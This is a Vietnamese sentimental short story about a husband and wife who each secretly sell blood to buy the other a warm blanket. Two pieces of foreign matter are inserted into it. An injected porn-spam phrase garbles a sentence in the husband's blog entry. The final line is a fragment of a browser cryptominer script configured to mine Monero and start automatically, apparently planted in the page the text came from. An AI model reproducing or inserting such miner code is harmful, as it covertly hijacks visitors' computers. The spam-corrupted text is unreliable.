TÌNH NGHĨA VỢ CHỒNG - Lê Phát Chức sưu tầm -

TÌNH NGHĨA VỢ CHỒNG

   Khi cô giật mình tỉnh dậy nửa đêm vì lạnh, anh thường ôm chặt cô vào lòng, dùng hơi ấm của cơ thể sưởi cho cô. Cô vốn là một người con gái xinh đẹp. "Vệ tinh” xung quanh cô nhiều không kể xiết, nhưng cô bỏ ngoài tai tất cả để chọn anh – một công nhân làm việc ở nhà máy, thu nhập còn không đủ cho 3 bữa ăn hàng ngày. Cô chấp nhận từ bỏ cả gia đình, thậm chí là công việc đầy tương lai của mình để cưới anh.
   Sau khi kết hôn, anh và cô mượn được nhà kho của một người bạn, họ sắp xếp lại thành một tổ ấm giản dị. Mùa đông đến, căn nhà kho trống trải, hút gió lại càng trở nên lạnh giá. Khi ấy chưa đủ tiền mua chăn, cô thường bị giật mình tỉnh giấc lúc nửa đêm vì lạnh. Những lúc đó, anh chỉ biết ôm chặt cô vào lòng, dùng hơi ấm của cơ thể để sưởi ấm cho cô. Một ngày, cô trở về nhà với vẻ mặt thất thần nhợt nhạt, anh lo lắng hỏi:
– Có phải em bị bệnh rồi không?
Cô chỉ mỉm cười nói:
– Em hơi mệt thôi!
Rồi hân hoan rút từ trong túi ra một tờ giấy bạc nhét vào tay anh:
– Chúng mình có tiền rồi anh ạ, mình đi mua một chiếc chăn thật ấm để đắp nhé.
Anh sững người ngạc nhiên nhìn tờ giấy bạc trong tay cô, giọng run run:
– Làm sao em lại có nhiều tiền vậy?
Cô vui vẻ kể lại với anh, tiền là do cô kiếm được khi đi phát tờ rơi. Cô phải đứng từ sáng đến tối mới được trả ngần ấy tiền. Nói rồi, cô vội vàng kéo anh ra khỏi nhà, không cho anh hỏi thêm điều gì nữa. Họ đi mua môt cái chăn vừa số tiền ấy. Từ đó, nửa đêm cô không còn bị giật mình thức giấc nữa.
   Vài năm sau, anh tìm được công việc tốt hơn và kiếm được nhiều tiền, tự mở công ty. Không bao lâu sau, anh đã xây cho cô một ngôi nhà khang trang, mua ô tô cùng rất nhiều đồ dùng đắt tiền khác. Anh nói muốn dành cho cô một cuộc sống ấm no đầy đủ, bù đắp lại những ngày tháng khó khăn vất vả trước đây. Cuộc sống bỗng vụt thay đổi, khiến cô có phần bàng hoàng và chưa kịp thích nghi với điều kiện mới.
Ngày chuyển nhà, anh bảo những đồ đạc cũ trong căn nhà kho của họ trước đây anh đều muốn vứt đi, không nên giữ lại bất cứ cái gì. Nhưng cô khăng khăng muốn giữ lại cái chăn để đắp. Thời gian dài họ vẫn dùng cái chăn cũ ấy và giờ đây, nó đã trở nên xù xì cũ kĩ, còn bị rách khá nhiều chỗ. Anh không ngừng phàn nàn với cô:
– Thôi bỏ cái chăn cũ này đi em, mình có thể mua một cái chăn mới ấm áp và tốt hơn rất nhiều. Em xem cả nhà mình toàn những đồ đắt tiền, nhìn cái chăn cũ này trong nhà trông thật chướng mắt.
Nhưng cô vẫn cố chấp nhất quyết giữ lại cái chăn cũ ấy, vì chỉ khi đắp nó cô mới cảm thấy ấm áp và được che chở.
   Một hôm, anh về nhà mang theo một cái chăn mới và nhất quyết bảo cô bỏ cái chăn cũ đi. Lần này, dù không nỡ nhưng cô vẫn phải nghe theo lời anh. Từ đó, hàng đêm cô ngủ không còn ngon giấc nữa, trong lòng cô lúc nào cũng cảm thấy thấp thỏm, lo lắng khiến cô thường hay giật mình lúc nửa đêm. Và mỗi lần tỉnh giấc như thế, cô lại đầm đìa nước mắt. Anh vốn không biết rằng để mua được cái chăn đó, cô đã phải đi bán máu lấy tiền, chứ không phải đi phát tờ rơi như cô đã từng nói với anh. Lần đầu tiên bán máu, biết bao đau đớn, cũng chỉ vì muốn có cái chăn này. Vậy mà, anh lại nỡ vất bỏ nó đi. Cô dần cảm thấy anh không còn yêu cô như xưa nữa.
Một ngày, anh có việc gấp phải ra ngoài, quên mang theo máy tính xách tay quen thuộc. Trên màn hình máy tính vẫn hiện lên trang blog của anh viết hàng ngày. Và cô bất chợt đọc được dòng chữ mà anh mới viết cách đây không lâu:
… "Ngày hôm ấy, em từ đâu về khuôn mặt tái xanh nhợt nhạt khiến cho anh lo lắng vô cùng. Em nói đi phát tờ rơi để mua chăn cho hai đứa. Tối hôm đó, chúng mình nằm ngủ ấm áp trong chiếc chăn mới, thấy emphim sex vnnam cuộn tròn trong lòng anh mà say trong giấc ngủ, thấy thương em biết bao. Đã bao đêm rồi, em không được ngủ ngon đến vậy. Và rồi tình cờ, anh nhìn thấy trên tay em có một vết sưng nhỏ, dường như bị kim tiêm đâm vậy. Anh bỗng hiểu ra tất cả. Hóa ra em nói dối anh là em đi phát tờ rơi, thực ra là em đã đi bán máu để có tiền mua chăn, chỉ vì một cái chăn mà em đã phải khổ sở và đau đớn đến vậy. Đêm đó, anh đã khóc vì thương em và anh cũng thầm hứa sẽ cố gắng làm việc, phấn đấu trở thành một người thành đạt, để có thể bù đắp lại những ngày tháng khốn khó này cho em. Và giờ đây, anh đã thực hiện được lời thề đó. Hôm qua, anh quyết định đến trạm hiến máu, anh muốn được cảm nhận một chút nỗi đau mà đã em từng trải qua. Khi chiếc kim tiêm đâm vào mạch máu, một cảm giác nhói buốt lan dọc khắp cơ thể của anh, nhưng anh không thấy đau, ngược lại, rất hạnh phúc. Anh lấy tiền bán máu và đi mua chiếc chăn mới này. Anh muốn nó là món quà bất ngờ mà anh dành cho em…”
   Nước mắt cô đã ướt đẫm tự độ nào. Hóa ra, tình yêu của anh dành cho cô vẫn sâu đậm và lớn lao đến vậy. Mùa đông năm nay, anh đã đổi máu của mình tặng cho cô chiếc chăn ấm, có lẽ đó cũng sẽ là chiếc chăn ấm áp nhất mà cô có trong đời…
 
              Sưu tầm
 
', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();